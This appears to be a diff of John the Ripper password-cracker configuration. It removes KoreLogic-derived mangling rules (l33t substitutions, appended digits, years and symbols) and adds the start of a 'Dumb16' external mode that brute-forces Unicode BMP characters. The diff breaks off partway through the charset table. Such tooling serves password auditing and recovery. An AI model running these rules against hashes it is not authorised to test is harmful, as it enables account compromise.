-# This is a lamer/faster version of --rules:nt
-;[List.Rules:KoreLogicRulesReplaceLettersCaps]
-c /[a-z] s\0\p[A-Z]
-
-;[List.Rules:KoreLogicRulesAddDotCom]
-[c:] <- \p[c:] Az".com"
-[c:] <- \p[c:] Az".net"
-[c:] <- \p[c:] Az".org"
-
-;[List.Rules:KoreLogicRulesPrependJustSpecials]
-[c:] \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-[c:] \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend1_AddSpecialEverywhere]
-[c:] >4 <- \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
-[c:] >[5-8] <- \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
-
-;[List.Rules:KoreLogicRulesAppendNum_AddSpecialEverywhere]
-# This should probably use $[02-9] since we try $1 in
-# KoreLogicRulesAppend1_AddSpecialEverywhere
-[c:] >4 <- \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[0-9]
-[c:] >[5-8] <- \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[0-9]
-
-;[List.Rules:KoreLogicRulesAppendNumNum_AddSpecialEverywhere]
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendNumNumNum_AddSpecialEverywhere]
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendYears_AddSpecialEverywhere]
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]" <+
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]" <+
-
-# This rule needs work actually --- you have to 'sort -u' its output    rick
-# /a = reject if it doesnt have an 'a'
-# the [:c] does waste some effort - and generate dupes. This is wasteful,
-# but I want to keep it in b/c the original crack/JtR rules use it.
-;[List.Rules:KoreLogicRulesL33t]
-[:c] /\r[aaAAbBeEiiiIIIllll] s\0\r\p[@44@88331!|1!|17|!] \p1[:M] \p1[:c] \p1[:Q]
-# The following line differs from Kore's erroneous 4 lines:
-[:c] /\r[LLLL] s\0\r\p[17|!] \p1[:M] \p1[:c] \p1[:Q]
-#/Lsl1[:c]
-#/Lsl7[:c]
-#/Lsl|[:c]
-#/Lsl![:c]
-[:c] /\r[oOssSStT1111003344557788] s\0\r\p[00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Full set (same as above, but on one line):
-#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Double substitutions start here.
-# Compared to Kore's, we check for both chars first, then replace both.
-# This produces different results from Kore's, which would replace all
-# instances of the first char before checking for the second.
-# Kore's behavior may be restored by moving "sa[@4]" to be right after "/a"
-# on the line below, and ditto for further lines.
-[:c] /a /\r[AAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] sa[@4] s\2\r\p2[4@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Kore had these (probably unintentionally, so we don't duplicate them):
-#/asa4/4s4a[:c]
-#/asa4/4s4A[:c]
-[:c] /A /\r[aabBeEiiiIIIllllLLLLoOssSStT1111003344557788] sA4 s\0\r\p[@488331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Kore also had these, but (intentionally?) missed sb8 on this set (after sA4)
-#/AsA4/4s4a[:c]
-#/AsA4/4s4A[:c]
-[:c] /b /\r[aaAABeEiiiIIIllllLLLLoOssSStT1111003344557788] sb8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /B /\r[aaAAbeEiiiIIIllllLLLLoOssSStT1111003344557788] sB8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /e /\r[aaAAbBEiiiIIIllllLLLLoOssSStT1111003344557788] se3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /E /\r[aaAAbBeiiiIIIllllLLLLoOssSStT1111003344557788] sE3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /i /\r[aaAAbBeEIIIllllLLLLoOssSStT1111003344557788] si[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /I /\r[aaAAbBeEiiillllLLLLoOssSStT1111003344557788] sI[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Kore's rules only included sl[17|], but not sl!
-[:c] /l /\r[aaAAbBeEiiiIIILLLLoOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# All "/L" rules (171 lines) were buggy
-[:c] /L /\r[aaAAbBeEiiiIIIlllloOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /o /\r[aaAAbBeEiiiIIIllllLLLLOssSStT1111003344557788] so0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /O /\r[aaAAbBeEiiiIIIllllLLLLossSStT1111003344557788] sO0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /s /\r[aaAAbBeEiiiIIIllllLLLLoOSStT1111003344557788] ss[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /S /\r[aaAAbBeEiiiIIIllllLLLLoOsstT1111003344557788] sS[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /t /\r[aaAAbBeEiiiIIIllllLLLLoOssSST1111003344557788] st+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /T /\r[aaAAbBeEiiiIIIllllLLLLoOssSSt1111003344557788] sT+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /1 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT003344557788] s1[!iI|] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /0 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11113344557788] s0[oO] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|eEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /3 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110044557788] s3[eE] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /4 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033557788] s4[aA] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /5 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033447788] s5[sS] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /7 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445588] s7[lL] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /8 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445577] s8[bB] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlL] \p1[:M] \p1[:c] \p1[:Q]
-# These are some popular triple/quad l33t rules
-[:c] /a /e /[los] sa4 se3 s\0\p[10$] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /[ae] /l /[os] s\2\p2[43] sl1 s\3\p3[0$] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /[ae] /o /s s\2\p2[43] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /l /o /s sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /a /[el] /o /s sa4 s\0\p[31] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /e /l /o /s se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /a /e /l /o /s sa4 se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-
-;[List.Rules:KoreLogicRulesReplaceSpecial2Special]
-# Kore's rules were missing "*"
-/! s![@#$%^&*()\-=_+\\|;:'",./?><]
-/@ s@[!#$%^&*()\-=_+\\|;:'",./?><]
-/# s#[!@$%^&*()\-=_+\\|;:'",./?><]
-/$ s$[!@#%^&*()\-=_+\\|;:'",./?><]
-/% s%[!@#$^&*()\-=_+\\|;:'",./?><]
-/^ s^[!@#$%&*()\-=_+\\|;:'",./?><]
-/& s&[!@#$%^*()\-=_+\\|;:'",./?><]
-/( s([!@#$%^&*)\-=_+\\|;:'",./?><]
-/) s([!@#$%^&*(\-=_+\\|;:'",./?><]
-# Kore's ruleset erroneously had:
-#/-s--
-/- s-[!@#$%^&*()=_+\\|;:'",./?><]
-/= s=[!@#$%^&*()\-_+\\|;:'",./?><]
-/_ s_[!@#$%^&*()\-=+\\|;:'",./?><]
-/+ s+[!@#$%^&*()\-=_\\|;:'",./?><]
-# Kore's rules did not replace backslash
-/\\ s\\[!@#$%^&*()\-=_+|;:'",./?><]
-/| s|[!@#$%^&*()\-=_+\\;:'",./?><]
-/; s;[!@#$%^&*()\-=_+\\|:'",./?><]
-/: s:[!@#$%^&*()\-=_+\\|;'",./?><]
-/' s'[!@#$%^&*()\-=_+\\|;:",./?><]
-/" s"[!@#$%^&*()\-=_+\\|;:',./?><]
-/, s,[!@#$%^&*()\-=_+\\|;:'"./?><]
-/. s.[!@#$%^&*()\-=_+\\|;:'",/?><]
-// s/[!@#$%^&*()\-=_+\\|;:'",.?><]
-/> s>[!@#$%^&*()\-=_+\\|;:'",./?<]
-/< s<[!@#$%^&*()\-=_+\\|;:'",./?>]
-
-;[List.Rules:KoreLogicRulesReplaceLetters]
-/a sa[b-z]
-/b sb[ac-z]
-/c sc[abd-z]
-/d sd[a-ce-z]
-/e se[a-df-z]
-/f sf[a-eg-z]
-/g sg[a-fh-z]
-/h sh[a-gi-z]
-/i si[a-hj-z]
-/j sj[a-ik-z]
-/k sk[a-jl-z]
-/l sl[a-km-z]
-/m sm[a-ln-z]
-/n sn[a-mo-z]
-/o so[a-np-z]
-/p sp[a-oq-z]
-/q sq[a-pr-z]
-/r sr[a-qs-z]
-/s ss[a-rt-z]
-/t st[a-su-z]
-/u su[a-tv-z]
-/v sv[a-uw-z]
-/w sw[a-vx-z]
-/x sx[a-wyz]
-/y sy[a-xz]
-# Kore's ruleset was truncated after "/zszr"
-/z sz[a-y]
-c /[a-z] s\0[A-Z]
-
-;[List.Rules:KoreLogicRulesAppendSpecialNumberNumber]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesPrependNumNumAppendSpecial]
-[c:] \p[c:] A0"[0-9][0-9]" <* $[!$@#%.]
-[c:] \p[c:] A0"[0-9][0-9]" <* $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
-
-;[List.Rules:KoreLogicRulesPrependNumNumSpecial]
-[c:] \p[c:] A0"[0-9][0-9][!$@#%.]"
-[c:] \p[c:] A0q[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend2NumSpecial]
-[c:] \p[c:] Az"[0-9][0-9][!$@#%.]" <+
-[c:] \p[c:] Azq[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependDaysWeek]
-A0"[Mm][oO0][nN][dD][aA4@][yY]"
-A0"[Tt][uU][eE3][sS$][dD][aA4@][yY]"
-A0"[Ww][eE3][dD][nN][eE3][sS$][dD][aA4@][yY]"
-A0"[Tt][hH][uU][rR][sS$][dD][aA4@][yY]"
-A0"[Ff][rR][iI1!][dD][aA4@][yY]"
-A0"[Ss][aA4@][tT+][uU][rR][dD][aA4@][yY]"
-A0"[Ss][uU][nN][dD][aA4@][yY]"
-
-;[List.Rules:KoreLogicRulesAppendNumbers_and_Specials_Simple-3]
-## Add Number Number Special
-[c:] \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-## Add Special Number Number
-[c:] \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecialAppendNumber]
-[c:] \p[c:] A0"[!$@#%.][!$@#%.]" <* $[0-9]
-[c:] \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <* $[0-9]
-
-;[List.Rules:KoreLogicRulesAppend4Num]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesPrependNumNumNumNum]
-[c:] \p[c:] A0"[0-9][0-9][0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesPrepend2NumbersAppend2Numbers]
-[c:] \p[c:] A0"[0-9][0-9]" <- Az"[0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesPrependCAPCAPAppendSpecial]
-A0"[A-Z][A-Z]" <* $[!$@#%.]
-A0"[A-Z][A-Z]" <* $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
-
-;[List.Rules:KoreLogicRulesAppendSpecialLowerLower]
-[c:] \p[c:] AzQ[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][a-z][a-z]Q <+
-
-# The last line of KoreLogicRulesAppendNumbers_and_Specials_Simple
-;[List.Rules:KoreLogicRulesAppendNumbers_and_Specials_Simple-4]
-# Add 100! ... 999! to the end
-[c:] \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendSpecial3num]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesAppendSpecialNumberNumberNumber]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesAppend3NumSpecial]
-[c:] \p[c:] Az"[0-9][0-9][0-9][!$@#%.]" <+
-[c:] \p[c:] Azq[0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependNumNum_AppendNumSpecial]
-[c:] \p[c:] A0"[0-9][0-9]" Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendJustSpecials3Times]
-[c:] \p[c:] Az"[!$@#%.][!$@#%.][!$@#%.]" <+
-[c:] \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendCap-Num_or_Special-Twice]
-[c:] \p[c:] Az"[A-Z][0-9][0-9]" <+
-[c:] \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q <+
-[c:] \p[c:] Azq[A-Z][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-[c:] \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecialAppendNumbersNumber]
-[c:] \p[c:] A0"[!$@#%.][!$@#%.]" <- Az"[0-9][0-9]"
-[c:] \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <- Az"[0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesAppend5Num]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendSpecial4num]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesPrepend4NumAppendSpecial]
-[c:] \p[c:] A0"[0-9][0-9][0-9][0-9]" <- $[!$@#%.]
-[c:] \p[c:] A0"[0-9][0-9][0-9][0-9]" <- Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend4NumSpecial]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9][!$@#%.]" <+
-[c:] \p[c:] Azq[0-9][0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecialAppendNumbersNumberNumber]
-[c:] \p[c:] A0"[!$@#%.][!$@#%.]" Az"[0-9][0-9][0-9]" <+
-[c:] \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q Az"[0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppend6Num]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9][0-9][0-9]" <+
@@ -0,0 +1,1395 @@
+# This  software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Generic implementation of "dumb" exhaustive search of Unicode BMP.
+# Default is to try *all* allocated characters in the BMP of Unicode v11
+# (there's 55,292 of them). Even if a fast format can exhaust two characters
+# in 15 minutes, three characters would take 1.5 years...
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 9 bytes each).
+[List.External:Dumb16]
+int maxlength;            // Maximum password length to try
+int last;                 // Last character position, zero-based
+int lastid;               // Character index in the last position
+int id[0x7f];             // Current character indices for other positions
+int charset[0x10000], c0; // Characters
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = 2;
+
+	# UTF-8 representation is up to 3x the character length
+	if (maxlength * 3 > cipher_limit)
+		maxlength = (cipher_limit + 2) / 3;
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
